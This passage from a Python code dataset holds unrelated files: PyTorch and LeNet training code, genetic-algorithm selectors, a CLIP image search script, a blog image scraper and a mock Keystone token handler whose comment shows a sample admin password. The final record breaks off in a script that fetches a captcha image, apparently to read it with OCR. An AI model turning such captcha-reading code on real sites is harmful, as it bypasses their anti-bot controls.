network_name=\"network\",\n path_prefix=\".\",\n report_interval=10,\n checkpoint_interval=1000,\n num_workers=8,\n valid_callback=lambda x: None):\n super(SupervisedTraining, self).__init__()\n self.valid_callback = valid_callback\n self.network_name = network_name\n self.batch_size = batch_size\n # self.train_writer = SummaryWriter(f'{network_name}-train')\n # self.valid_writer = SummaryWriter(f'{network_name}-valid')\n # self.meta_writer = SummaryWriter(f'{network_name}-meta')\n self.device = device\n self.accumulate = accumulate\n self.num_workers = num_workers\n self.optimizer = optimizer(net.parameters())\n if schedule is None:\n self.schedule = torch.optim.lr_scheduler.ReduceLROnPlateau(self.optimizer, patience=10)\n else:\n self.schedule = schedule\n self.losses = losses\n self.train_data = DataLoader(\n train_data, batch_size=batch_size, num_workers=self.num_workers, shuffle=True, drop_last=True\n )\n self.validate_data = DataLoader(\n validate_data, batch_size=batch_size, num_workers=self.num_workers, shuffle=True, drop_last=True\n )\n self.net = net.to(self.device)\n self.max_epochs = max_epochs\n self.checkpoint_path = f\"{path_prefix}/{network_name}-checkpoint\"\n self.report_interval = report_interval\n self.checkpoint_interval = checkpoint_interval\n self.step_id = 0\n self.epoch_id = 0\n self.validation_losses = [0 for _ in range(len(self.losses))]\n self.training_losses = [0 for _ in range(len(self.losses))]\n self.best = None\n\n def save_path(self):\n return self.checkpoint_path + \"-save.torch\"\n\n def checkpoint(self):\n the_net = self.net\n if isinstance(the_net, torch.nn.DataParallel):\n the_net = the_net.module\n netwrite(\n self.net,\n f\"{self.checkpoint_path}-epoch-{self.epoch_id}-step-{self.step_id}.torch\"\n )\n self.each_checkpoint()\n\n def run_networks(self, data):\n inputs, *labels = data\n if not isinstance(inputs, (list, tuple)):\n inputs = [inputs]\n predictions = self.net(*inputs)\n if not isinstance(predictions, (list, tuple)):\n predictions = [predictions]\n return [combined for combined in zip(predictions, labels)]\n\n def loss(self, inputs):\n loss_val = torch.tensor(0.0).to(self.device)\n for idx, the_input in enumerate(inputs):\n this_loss_val = self.losses[idx](*the_input)\n self.training_losses[idx] = float(this_loss_val)\n loss_val += this_loss_val\n return loss_val\n\n def valid_loss(self, inputs):\n training_cache = list(self.training_losses)\n loss_val = self.loss(inputs)\n self.validation_losses = self.training_losses\n self.training_losses = training_cache\n return loss_val\n\n def step(self, data):\n if self.accumulate is None:\n self.optimizer.zero_grad()\n outputs = self.run_networks(data)\n loss_val = self.loss(outputs)\n loss_val.backward()\n torch.nn.utils.clip_grad_norm_(self.net.parameters(), 5.0)\n if self.accumulate is None:\n self.optimizer.step()\n elif self.step_id % self.accumulate == 0:\n self.optimizer.step()\n self.optimizer.zero_grad()\n self.each_step()\n\n def validate(self, data):\n with torch.no_grad():\n self.net.eval()\n outputs = self.run_networks(data)\n self.valid_loss(outputs)\n self.each_validate()\n self.valid_callback(\n self, to_device(data, \"cpu\"), to_device(outputs, \"cpu\")\n )\n self.net.train()\n\n def schedule_step(self):\n self.schedule.step(sum(self.validation_losses))\n\n def each_step(self):\n Training.each_step(self)\n for idx, loss in enumerate(self.training_losses):\n self.train_writer.add_scalar(f\"loss {idx}\", loss, self.step_id)\n self.train_writer.add_scalar(f\"loss total\", sum(self.training_losses), self.step_id)\n\n def each_validate(self):\n for idx, loss in enumerate(self.validation_losses):\n self.valid_writer.add_scalar(f\"loss {idx}\", loss, self.step_id)\n self.valid_writer.add_scalar(f\"loss total\", sum(self.validation_losses), self.step_id)\n\n def each_epoch(self):\n for tag in [f\"loss {idx}\" for idx in range(len(self.training_losses))] + \\\n [f\"loss total {idx}\" for idx in range(len(self.validation_losses))]:\n # make a straight line in the tensorboard at the start of every epoch\n self.meta_writer.add_scalar(tag, self.epoch_id, self.step_id)\n self.meta_writer.add_scalar(tag, 0, self.step_id)\n self.meta_writer.add_scalar(tag, self.epoch_id, self.step_id)\n\n def train(self):\n for epoch_id in range(self.max_epochs):\n self.epoch_id = epoch_id\n valid_iter = iter(self.validate_data)\n for data in self.train_data:\n data = to_device(data, self.device)\n self.step(data)\n if self.step_id % self.report_interval == 0:\n vdata = None\n try:\n vdata = next(valid_iter)\n except StopIteration:\n valid_iter = iter(self.validate_data)\n vdata = next(valid_iter)\n vdata = to_device(vdata, self.device)\n self.validate(vdata)\n if self.step_id % self.checkpoint_interval == 0:\n self.checkpoint()\n self.step_id += 1\n self.schedule_step()\n self.each_epoch()\n return self.net\n\nclass MaskedSupervisedTraining(SupervisedTraining):\n def run_networks(self, data):\n inputs, labels_masks = data\n labels = [label for (label, mask) in labels_masks]\n masks = [mask for (label, mask) in labels_masks]\n predictions = self.net(inputs)\n return list(zip(predictions, labels, masks))\n\nclass FewShotTraining(SupervisedTraining):\n def __init__(self, net, train_data, validate_data, losses,\n optimizer=torch.optim.Adam,\n schedule=None,\n max_epochs=50,\n batch_size=128,\n device=\"cpu\",\n network_name=\"network\",\n path_prefix=\".\",\n report_interval=10,\n checkpoint_interval=1000,\n valid_callback=lambda x: None):\n super(FewShotTraining, self).__init__(\n net, train_data, validate_data, losses,\n optimizer=optimizer,\n schedule=schedule,\n max_epochs=max_epochs,\n batch_size=batch_size,\n device=device,\n network_name=network_name,\n path_prefix=path_prefix,\n report_interval=report_interval,\n checkpoint_interval=checkpoint_interval,\n valid_callback=valid_callback\n )\n\n support_data = copy(train_data)\n train_data.data_mode = type(train_data.data_mode)(1)\n support_data = SupportData(train_data, shots=5)\n validate_support_data = SupportData(validate_data, shots=5)\n self.support_loader = iter(DataLoader(support_data))\n self.valid_support_loader = iter(DataLoader(validate_support_data))\n\n def run_networks(self, data, support, support_label):\n predictions = self.net(data, support)\n return list(zip(predictions, support_label))\n\n def step(self, inputs):\n data, label = inputs\n self.optimizer.zero_grad()\n\n permutation = [0, 1, 2]\n random.shuffle(permutation)\n\n support, support_label = next(self.support_loader)\n\n lv = label[0].reshape(-1)\n for idx, val in enumerate(lv):\n lv[idx] = permutation[int(val[0])]\n lv = support_label.reshape(-1)\n for idx, val in enumerate(lv):\n lv[idx] = permutation[int(val[0])]\n\n support = support[0].to(self.device)\n support_label = support_label[0].to(self.device)\n outputs = self.run_networks(data, support, support_label)\n\n loss_val = self.loss(outputs)\n loss_val.backward()\n self.optimizer.step()\n self.each_step() \n\n def validate(self):\n with torch.no_grad():\n self.net.eval()\n vit = iter(self.validate_data)\n inputs, *label = next(vit)\n inputs, label = inputs.to(self.device), list(map(lambda x: x.to(self.device), label))\n support, support_label = next(self.valid_support_loader)\n support = support[0].to(self.device)\n support_label = support_label[0].to(self.device)\n outputs = self.run_networks(inputs, support, support_label)\n self.valid_loss(outputs)\n self.each_validate()\n self.valid_callback(self, to_device(inputs, \"cpu\"), to_device(outputs, \"cpu\"))\n self.net.train()\n","sub_path":"torchsupport/training/training.py","file_name":"training.py","file_ext":"py","file_size_in_byte":11727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"566875","text":"from sklearn.datasets import load_iris\nfrom sklearn.datasets import load_breast_cancer\nfrom sklearn.linear_model import Perceptron\nimport matplotlib.pyplot as plt\nimport numpy as np\n\ndef load_iris_3classes():\n data = load_iris()\n return data.data,data.target\n\ndef load_iris_binary():\n data = load_iris()\n X = data.data\n y = data.target\n y[y == 2] = 1\n\n return X,y\n\ndef plota_dados(X, weights):\n plt.scatter(X[:, 0], X[:, 1], c=y, cmap=plt.cm.Set1, edgecolor='k')\n\n # x_line = np.linspace(-1,1,15)\n # y_line = weights[0, 1]/x_line\n\n # for i in range(0, len(weights[0, :])):\n # plt.plot(x_line, y_line)\n #\n plt.show()\n\nif __name__ == '__main__':\n\n\n # X, y = load_iris_3classes()\n X, y = load_iris_binary()\n\n clf = Perceptron(tol=1e-3)\n clf.fit(X, y)\n\n print(clf.coef_)\n print(clf.intercept_)\n print(clf.predict(X))\n\n plota_dados(X, clf.coef_)\n\n\n","sub_path":"7_perceptron.py","file_name":"7_perceptron.py","file_ext":"py","file_size_in_byte":909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"224849083","text":"from network.model import p_net, r_net, o_net\nfrom network.train_model import train\nimport argparse\nimport os\nimport sys\nimport config as FLAGS\n\nos.environ['CUDA_DEVICE_ORDER'] = 'PCI_BUS_ID'\nos.environ['CUDA_VISIBLE_DEVICES'] = '{}'.format(FLAGS.gpu)\n\nroot_dir = os.path.dirname(__file__).split('MTCNN')[0]\nproject_dir = os.path.dirname(__file__).split('MTCNN')[1]\n\ndef main(save_dir, input_size):\n base_dir = os.path.join(save_dir, input_size)\n net = None\n if input_size == '12':\n net = 'pnet'\n net_factory = p_net\n end_epoch = FLAGS.end_epoch[0]\n elif input_size == '24':\n net = 'rnet'\n net_factory = r_net\n end_epoch = FLAGS.end_epoch[1]\n else:\n net = 'onet'\n net_factory = o_net\n end_epoch = FLAGS.end_epoch[2]\n\n model_dir = os.path.join(root_dir + 'MTCNN' + '/checkpoint', net)\n if not os.path.exists(model_dir):\n os.mkdir(model_dir)\n model_prefix = os.path.join(model_dir, net)\n display = FLAGS.display\n lr = FLAGS.lr\n train(net_factory, model_prefix, end_epoch, base_dir, display, lr)\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='train')\n parser.add_argument('--save_dir', type=str, default='/mnt/data/changshuang/gen_data',\n help='保存图片路径')\n parser.add_argument('--input_size', type=str, default='48', choices=['12', '24', '48'],\n help='对于具体网络输入图片的大小')\n args = parser.parse_args()\n main(args.save_dir, args.input_size)\n\n \n","sub_path":"src/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1565,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"192298256","text":"# Copyright 2016 Red Hat, Inc.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 2 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA\n#\n# Refer to the README and COPYING files for full details of the license\n#\n\nfrom BaseHTTPServer import BaseHTTPRequestHandler\n\n\nclass GetTokenHandler(BaseHTTPRequestHandler):\n\n def do_POST(self):\n self.send_response(200)\n self.send_header(\"Content-Type\", \"Application/json\")\n self.send_header(\"x-openstack-request-id\",\n \"req-edf1f07f-1ccf-4d42-a073-b2bd99bb9f4a\")\n\n self.end_headers()\n self.wfile.write(self.response_string)\n return\n\n response_string = \"\"\"\n\n{\n\"access\":{\n \"token\":{\n\n \"id\": \"b591657e28e54b4ca1032cfc3e426e0a\"\n }\n}}\n\"\"\"\n\n\"\"\"\nRequest:\n\nPOST\nhttp://192.168.120.151:35357/v2.0/tokens\nheaders={Content-Type=[application/json]}\n\n{\"auth\":\n{\"tenantName\": \"admin\", \"passwordCredentials\": {\"username\": \"admin\", \"password\": \"f0d910204e194de7\"}}}\n\n\"\"\"\n","sub_path":"ovn-provider/handler_keystone.py","file_name":"handler_keystone.py","file_ext":"py","file_size_in_byte":1578,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"41607286","text":"#genetic algorithm selection routines\n#based on galib.\n#exception - these classes only work on the scaled fitness\n\nimport numpy as np\n\nfrom ga_util import GAError\nfrom prng import prng\n\nclass selector(object):\n def update(self,pop):\n pass\n def select(self,pop):\n raise GAError('selector.select() must be overridden')\n def clear(self):\n pass\n\nclass uniform_selector(selector):\n def select(self,pop,cnt = 1):\n if cnt == 1:\n return prng.choice(pop)\n res = []\n for i in range(cnt):\n res.append(prng.choice(pop))\n return res\n\n#class rank_selector(selector):\n# def select(self,pop,cnt = 1):\n# pop.sort()\n# studliest = pop[0].fitness()\n# # XXX: y?\n# tied_for_first = [x for x in pop if x.fitness() == y]\n# if cnt == 1:\n# return prng.choice(tied_for_first)\n# res = []\n# for i in range(cnt):\n# res.append(prng.choice(tied_for_first))\n# return res\n\n#scores must all be positive\nclass roulette_selector(selector):\n def update(self,pop):\n self.pop = pop[:]\n sz = len(pop)\n if not sz:\n raise GAError('srs_selector - the pop size is 0!')\n f =self.pop.fitnesses()\n f_max = max(f); f_min = min(f)\n if not ( (f_max >= 0 and f_min >= 0) or\n (f_max <= 0 and f_min <= 0)):\n raise GAError('srs_selector requires all fitnesses values to be either strictly positive or strictly negative')\n if f_max == f_min:\n f = np.ones_like(f)\n self.dart_board = np.add.accumulate(f / sum(f,axis=0))\n\n def select(self,pop,cnt = 1):\n returns = []\n for i in range(cnt):\n dart = prng.random()\n idx = 0\n #binary search would be faster\n while dart > self.dart_board[idx]:\n idx = idx + 1\n returns.append(self.pop[idx])\n if cnt == 1:\n return returns[0]\n else:\n return returns\n\n def clear(self):\n del self.pop\n\n#scores must all be positive\nclass srs_selector(selector):\n def update(self,pop):\n sz = len(pop)\n if not sz:\n raise GAError('srs_selector - the pop size is 0!')\n f =pop.fitnesses()\n f_max = max(f); f_min = min(f)\n if not ( (f_max >= 0. and f_min >= 0.) or\n (f_max <= 0. and f_min <= 0.)):\n raise GAError('srs_selector requires all fitnesses values to be either strictly positive or strictly negative - min %f, max %f' %(f_min,f_max))\n f_avg = sum(f,axis=0)/sz\n if f_avg == 0.:\n e = np.ones_like(f)\n else:\n if pop.min_or_max() == 'max':\n e = f/f_avg\n else:\n e = (-f+f_max+f_min)/f_avg\n self.expected_value = e\n garauntee,chance = divmod(e,1.)\n# garauntee = floor(e)\n# chance = remainder(e,1)\n choices = []\n for i in xrange(sz):\n choices = choices + [pop[i]] * int(garauntee[i])\n #now deal with the remainder\n dart_board = np.add.accumulate(chance / sum(chance,axis=0))\n for i in range(len(choices),sz):\n dart = prng.random()\n idx = 0\n while dart > dart_board[idx]:\n idx = idx + 1\n choices.append(pop[idx])\n self.choices = choices\n\n def select(self,pop,cnt = 1): #ignore the past in pop\n res = []\n for i in range(cnt):\n res.append(prng.choice(self.choices))\n# for chosen in res: self.choices.remove(chosen)\n if cnt == 1:\n return res[0]\n return res\n\n def clear(self):\n if hasattr(self,'choices'):\n del self.choices\n","sub_path":"python/packages/scipy-0.6.0/scipy/sandbox/ga/selection.py","file_name":"selection.py","file_ext":"py","file_size_in_byte":3789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"583590697","text":"from __future__ import print_function\nimport torch.nn as nn\nimport torch.nn.functional as F\n\n\nclass LeNet(nn.Module):\n def __init__(self,rho = 0.001):\n super(LeNet, self).__init__()\n\n self.conv1 = nn.Conv2d(1, 20, 3, stride=1, padding=1)\n self.conv2 = nn.Conv2d(20, 50, 3, stride=1, padding=1)\n self.fc1 = nn.Linear(7 * 7 * 50, 500)\n self.fc2 = nn.Linear(500, 10)\n\n def forward(self, x):\n x = F.relu(self.conv1(x))\n x = F.max_pool2d(x, 2, 2)\n x = F.relu(self.conv2(x))\n x = F.max_pool2d(x, 2, 2)\n x = x.view(-1, 7 * 7 * 50)\n x = F.relu(self.fc1(x))\n x = self.fc2(x)\n return F.log_softmax(x, dim=1)\n","sub_path":"lenet.py","file_name":"lenet.py","file_ext":"py","file_size_in_byte":695,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"566058020","text":"import numpy as np\nimport matplotlib.pyplot as plt\nplt.style.use('fivethirtyeight')\nimport pandas as pd\nimport random as rand\n\n\ndef k_fold_cross_validation(class_i,k_fold):\n #K-Fold Cross Validation and evaluation\n n = len(class_i)\n training_set = [[]for x in range(n)]\n testing_set = [[]for x in range(n)]\n #Every class has the same number of data, so you randomly pick class: 0\n initial_data = len(class_i[0])\n step = int(initial_data/k_fold)\n residual = initial_data - step*k_fold\n num_of_data = initial_data - residual\n\n for class_index in range(n):\n for start in range(0,num_of_data,step):\n testing_set[class_index].append(class_i[class_index][start:start+step])\n if(start == 0):\n training_set[class_index].append(class_i[class_index][start+step:num_of_data])\n else:\n training_set[class_index].append(class_i[class_index][0:start])\n training_set[class_index][-1]+=(class_i[class_index][start+step:num_of_data])\n return training_set,testing_set\n\n# Correct and wrong answers for each fold\ndef calc_confusion_matrix(classes,testing_set,class_weights,fold):\n num_of_classes = len(testing_set)\n num_of_points_in_fold = len(testing_set[0][0])\n correct = 0\n wrong = 0\n for class_index in range(num_of_classes):\n for point in (testing_set[class_index][fold]):\n result = score_set(class_weights,fold,point)\n if(result == class_index):\n correct += 1\n else:\n wrong += 1\n return [correct,wrong]\n\n#Predicts in which class a point is classified\ndef score_set(w,fold,point):\n scores = []\n num_of_classes = len(class_weights)\n num_of_x = len(point)\n #input(num_of_weights)\n for class_index in range(num_of_classes):\n b = w[class_index][fold][0]\n h = 0\n for i in range(num_of_x):\n h += w[class_index][fold][i+1]*point[i]\n h += b\n score = (1-h)**2 #y-y_predicted\n scores.append(score)\n class_classified_to = scores.index(max(scores))\n return class_classified_to\n\n\ndef observedValue(Y,class_index,sets):\n start = class_index*sets\n stop = class_index*sets + sets\n for i in range(len(Y)):\n Y[i] = 1\n for i in range(start,stop):\n Y[i] *= -1\n return Y\n\n\n#Features get a discrete value of 1 or -1\nfeatures_y = []\n#To store all the data, for each class and each class's color for plotting. We have n classes\nn = 3\nclass_i = [[]for x in range(n)]\ncolor = [\"blue\",\"orange\",\"green\"]\n#Data points m for each class\nm = 100\n#Storing weights for each class, for each training set\nclass_weights = [[]for x in range(n)]\n#For confusion matrix, evaluating each k - fold corss validation\nevaluate_set = []\n\n\n\n#Points for feature A\nfor i in range(m):\n x1 = rand.randint(20,60)\n x2 = rand.randint(20,60)\n class_i[0].append([x1,x2])\n features_y.append(1)\n\n#Points for feature B\nfor i in range(m):\n x1 = rand.randint(60,100)\n x2 = rand.randint(80,120)\n class_i[1].append([x1,x2])\n features_y.append(-1)\n\n#Points for feature C\nfor i in range(m):\n x1 = rand.randint(100,140)\n x2 = rand.randint(20,60)\n class_i[2].append([x1,x2])\n features_y.append(-1)\n\nfor i in range(int(m/4)):\n for j in range(3):\n x1 = rand.randint(20,140)\n x2 = rand.randint(20,120)\n pos = rand.randint(0,m-1)\n class_i[j][pos] = [x1,x2]\n\n\n#Setting training and testing set, divided by K for cross validation\nk = 10\ntraining_set,testing_set = k_fold_cross_validation(class_i,k)\n#training_points is the number of training sets for each class. training_points = all_points - testing_points.\n#Every class has same num of training points, so we pick randomly, say class 0 training set 0\nm = m - m%k\ntraining_points = len(training_set[0][0])\n#input(training_points)\ntesting_points = len(testing_set[0][0])\n#input(testing_points)\n#Setting y vector\ny = np.concatenate((features_y[0*m:0*m+m-testing_points],features_y[(0+1)*m:(0+1)*m+m-testing_points])).T\nfor i in range(1,n-1):\n y = np.concatenate((y,features_y[(i+1)*m:(i+1)*m+m-testing_points])).T\n\n\n\n #TRAINING PHASE\n\n#k = num of folds, n = num of classes\nfor i in range(k):\n for class_index in range(n):\n for point in range(training_points):\n plt.scatter(training_set[class_index][i][point][0],training_set[class_index][i][point][1],color = color[class_index])\n X = np.vstack((training_set[0][i],training_set[1][i]))\n X = np.vstack((X,training_set[2][i]))\n m = len(X)\n X = np.array([np.ones(m), X[:, 0], X[:, 1]]).T\n #Calculate weights for each class ,for each training set(k)\n #Linear Equation for solving this problem is computed by W = ((XTX)^−1)XTy\n for class_index in range(n):\n y = observedValue(y,class_index,training_points)\n w_i = np.linalg.inv(X.T @ X) @ (X.T @ y)\n class_weights[class_index].append(w_i)\n\n\n #TESTING PHASE\n\n#testing_points = number of points to test\n#Every class has the same number of testing point, so we pick one randomly, say class 0 testing set 0\n\n#Calculating confusion matrix for each training set\nconfusion_matrix = []\n\nfor fold in range(len(testing_set[0])):\n results = calc_confusion_matrix(class_i,testing_set,class_weights,fold)\n confusion_matrix.append(results)\n\nprint(confusion_matrix)\n\nfor i in range(len(confusion_matrix)):\n if(confusion_matrix[i][0] == 0):\n evaluate_set.append(0)\n else:\n evaluate_set.append(confusion_matrix[i][0]/testing_points) #confusion_matrix[i][0] number of correct guesses for class all classes in data set i\n\n#To store the weights of the classes which had the best evaluated set( if many sets scored equally, we get the first one)\nwinning_weights = []\n\n#Index of the highest scored set\nbest_set = evaluate_set.index(max(evaluate_set))\nfor i in range(n):\n winning_weights.append(class_weights[i][best_set])\n\n\nprint(\"The best weights came from the set: \",best_set)\n\n\n#Plotting classes and decision boarders\nline_x = np.linspace(0,140)\nclass_index = 0\nfor class_i in winning_weights:\n class_index += 1\n line_y = -class_i[0] / class_i[2] - (class_i[1] / class_i[2]) * line_x\n plt.plot(line_x,line_y,label = 'Class ' + str(class_index))\n\nplt.title('Training set selected : '+str(best_set))\nplt.legend()\nplt.tight_layout()\nplt.show()\n","sub_path":"Linear problems/LSBinaryClassifier.py","file_name":"LSBinaryClassifier.py","file_ext":"py","file_size_in_byte":6444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"191447761","text":"from itertools import product\nimport numpy as np\n\n\ndef gauss_elim(A):\n m, n = A.shape\n\n if A.any() != 0:\n v, i = next((A[i, j], i)\n for j, i in product(range(n), range(m))\n if A[i, j] != 0)\n A[i, :] /= v\n A[[i, 0], :] = A[[0, i], :]\n for i in range(1, m):\n if A[i, 0] != 0:\n A[i, :] -= A[0, :] * A[i, 0]\n\n gauss_elim(A[1:, 1:])\n return A\n\n\nif __name__ == '__main__':\n VectorA = [[0], [0], [9]]\n MatrixA = np.array([[0, -1, -1],\n [-1, 2, -1],\n [-1, -1, 3]],\n dtype=np.float32)\n SystemA = np.append(MatrixA, VectorA, 1)\n VectorB = [[2], [5], [7]]\n MatrixB = np.array([[0, 1, 2],\n [1, -1, 1],\n [1, 0, 3]],\n dtype=np.float32)\n SystemB = np.append(MatrixB, VectorB, 1)\n\n gauss_elim(SystemA)\n gauss_elim(SystemB)\n\n print(SystemA)\n print(SystemB)\n","sub_path":"linear_algebra/gauss_elimination.py","file_name":"gauss_elimination.py","file_ext":"py","file_size_in_byte":1012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"205740822","text":"import time\r\nimport os\r\nfrom Utils import *\r\nimport IPython.display\r\nimport cv2\r\n\r\n\r\ndef searched_images(params):\r\n image_features, image_attributes = get_image_features(params.get(\"directory\"))\r\n text_features = encode_search_query(params.get(\"search_query\"))\r\n best_photo_ids, similarity = find_best_matches(text_features, image_features.cpu().numpy(), image_attributes,\r\n params.get(\"N_images\", 3))\r\n list_res = []\r\n for i in range(len(best_photo_ids)):\r\n dict_ = {\"Photo_id\": best_photo_ids[i], \"position\": i + 1, \"score\": similarity[i]}\r\n list_res.append(dict_)\r\n\r\n for i in best_photo_ids:\r\n img = cv2.imread(\r\n os.path.join(params.get(\"directory\"), i))\r\n resized_image = cv2.resize(img, (1000, 700))\r\n cv2.imshow(\"sample1\", resized_image)\r\n cv2.waitKey(0)\r\n\r\n return list_res\r\n\r\n\r\nif __name__ == \"__main__\":\r\n params = {\"directory\": r\"C:\\Users\\vaibh\\Downloads\\PM1 Internship\\natural-language-joint-query-search\\images\",\r\n \"search_query\": \"Children playing football\",\r\n \"N_images\": 3}\r\n start = time.time()\r\n list_res = searched_images(params)\r\n end = time.time()\r\n print(end - start)\r\n print(list_res)\r\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"486741762","text":"import collections\n\n\nclass Solution:\n def countCharacters(self, words, chars: str) -> int:\n chars_map = collections.Counter(chars)\n\n num = 0\n for word in words:\n count = True\n\n word_map = collections.Counter(word)\n for k,v in word_map.items():\n if v <= chars_map.get(k,0):\n continue\n else:\n count =False\n\n if count is True:\n num += len(word)\n return num\n\n\n","sub_path":"1160. 拼写单词.py","file_name":"1160. 拼写单词.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"107918207","text":"# coding:utf-8\n\n\nimport os\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\n\nimport dutil\n\n\nimage_dir = \"./blog_images\"\nblog_data_dir = \"./blog_data\"\n\n\nclass Blog:\n \"\"\"\n 欅坂のブログは、\n 一つのarticleがあるBlogと、\n 複数のarticleがあるPageで構成されている\n \"\"\"\n def __init__(self):\n self.url = None\n self.created_at = None\n self.title = None\n self.author = None\n self.text = None\n self.images = [] #複数ある場合もある\n self.article = None # 一応純粋なarticleも保存しとく\n\n def set_url(self, url):\n self.url = url\n \n def _get_article(self):\n # TODO: 例外処理する\n r = requests.get(self.url)\n soup = BeautifulSoup(r.content, 'html.parser')\n self.article = soup.find('article')\n \n def set_data(self, article):\n \"\"\"\n page経由で取得の時にarticleからsetできるように設計\n \"\"\"\n innerHead = article.find(\"div\", {\"class\": \"innerHead\"})\n title = innerHead.find(\"h3\").text.strip()\n author = innerHead.find(\"p\", {\"class\": \"name\"}).text\n author = \"\".join(author.split())\n created_at = article.find(\"div\", {\"class\": \"box-bottom\"}).text.strip()\n created_at = \"T\".join(created_at.split(\" \"))\n created_at = \"-\".join(created_at.split(\"/\"))\n pattarn = '[0-9]{4}-[0-9]{2}-[0-9]{2}T[0-9]{2}:[0-9]{2}'\n created_at = re.match(pattarn , created_at).group()\n text = article.find(\"div\", {\"class\": \"box-article\"}).text\n images = article.find_all(\"img\")\n\n try:\n images = [i[\"src\"] for i in images]\n except KeyError:\n images = []\n \n self.created_at = created_at\n self.title = title\n self.author = author\n self.text = text\n self.images = images\n\n\n def set_data_from_url(self, url):\n self.set_url(url)\n self._get_article()\n self.set_data(self.article)\n\n\nclass Page(Blog):\n def __init__(self, page_url):\n self.page_url = page_url\n self.all_data = []\n self.set_data_from_url()\n\n def __len__(self):\n return len(self.all_data)\n \n def set_data_from_url(self):\n r = requests.get(self.page_url)\n soup = BeautifulSoup(r.content, 'html.parser')\n articles = soup.find_all('article')\n for article in articles:\n b = Blog()\n b.set_data(article)\n self.all_data.append(b)\n\n def save_image(self, image_dir):\n for b in self.all_data:\n imgs = b.images\n name = b.author\n created_at = b.created_at\n DIR = image_dir + \"/\" + name\n if not os.path.exists(DIR):\n os.makedirs(DIR)\n if imgs != []:\n for idx, i in enumerate(imgs):\n ext = i.split(\".\")[-1]\n filename = \"{}/{}_{}.{}\".format(DIR, created_at, str(idx), ext)\n img = dutil.download_image(i)\n if img != None:\n dutil.save_image(filename, img)\n\n\ndef get_member_list():\n \"\"\" メンバーのリストを取得する\n \"\"\"\n url = \"https://www.keyakizaka46.com/s/k46o/search/artist?ima=0000\"\n r = requests.get(url)\n soup = BeautifulSoup(r.content, 'html.parser')\n box_member = soup.find_all(\"div\", {'class': 'box-member'})\n box_member = box_member[-1].find_all(\"li\")\n \n member_dict = {}\n for i in box_member:\n href = i.find(\"a\").get(\"href\")\n id_ = href.split(\"/\")[-1].rstrip(\"?ima=0000\")\n img_url = i.find(\"img\")[\"src\"]\n author = i.find(\"p\", {\"class\": \"name\"}).text.strip()\n birth = i.find(\"p\", {\"class\": \"birth\"}).text.strip()\n member_dict[author] = [id_, href, img_url, birth]\n return member_dict\n\ndef test_get_blog():\n b = Blog()\n #b.set_data_from_url(\"http://www.keyakizaka46.com/s/k46o/diary/detail/15824?ima=0000&cd=member\")\n b.set_data_from_url(\"http://www.keyakizaka46.com/s/k46o/diary/detail/15557?ima=0000&cd=member\")\n print(\"url:\" , b.url)\n print(\"created_at:\", b.created_at)\n print(\"title:\" , b.title )\n print(\"author:\" , b.author )\n print(\"text:\" , b.text )\n print(\"images:\" , b.images )\n\ndef test_get_page():\n page_number = 1\n p = Page(\"http://www.keyakizaka46.com/s/k46o/diary/member/list?ima=0000&page=1&cd=member&ct=03\")\n print(\"url:\" , p.all_data[page_number].url)\n print(\"created_at:\", p.all_data[page_number].created_at)\n print(\"title:\" , p.all_data[page_number].title )\n print(\"author:\" , p.all_data[page_number].author )\n #print(\"text:\" , p.all_data[page_number].text )\n print(\"images:\" , p.all_data[page_number].images )\n print(\"len:\" , len(p))\n \n # 写真の保存\n #p.save_image()\n\ndef search_blog2save(name, start_page_num=0, max_page_num=10):\n members = get_member_list()\n for i in range(start_page_num, max_page_num):\n print(\"...{}\".format(max_page_num - i))\n url = \"http://www.keyakizaka46.com/s/k46o/diary/member/list?ima=0000&page={}&cd=member&ct={}\".format(i, members[name][0])\n p = Page(url)\n if len(p) == 0:\n continue\n \n # 写真を保存する\n p.save_image(image_dir)\n path = p.page_url.split(\"/\")[-1]\n dutil.save_pickle(p, path, blog_data_dir)\n\n\nif __name__ == \"__main__\":\n m = get_member_list()\n for i in m.keys(): # メンバーの名前のリスト\n print(i)\n search_blog2save(i)\n","sub_path":"scraping.py","file_name":"scraping.py","file_ext":"py","file_size_in_byte":5683,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"324962965","text":"import requests\nfrom bs4 import BeautifulSoup\nimport os\nimport pytesseract\nfrom PIL import Image\nimport re\n\nimage_url='http://localhost:8080/tdd/checkcode/image.jsp'\ndir='/opt/projects/pyproject'\nif not os.path.exists(dir):\n os.mkdir(dir)\nos.chdir(dir)\nr=requests.get(image_url)\nimg_content=r.content\nfile='checkcode.jpg'\nif(os.path.exists(file)):\n os.remove(file)\nwith open(file,'ab') as img_object:\n img_object.write(img_content)\n 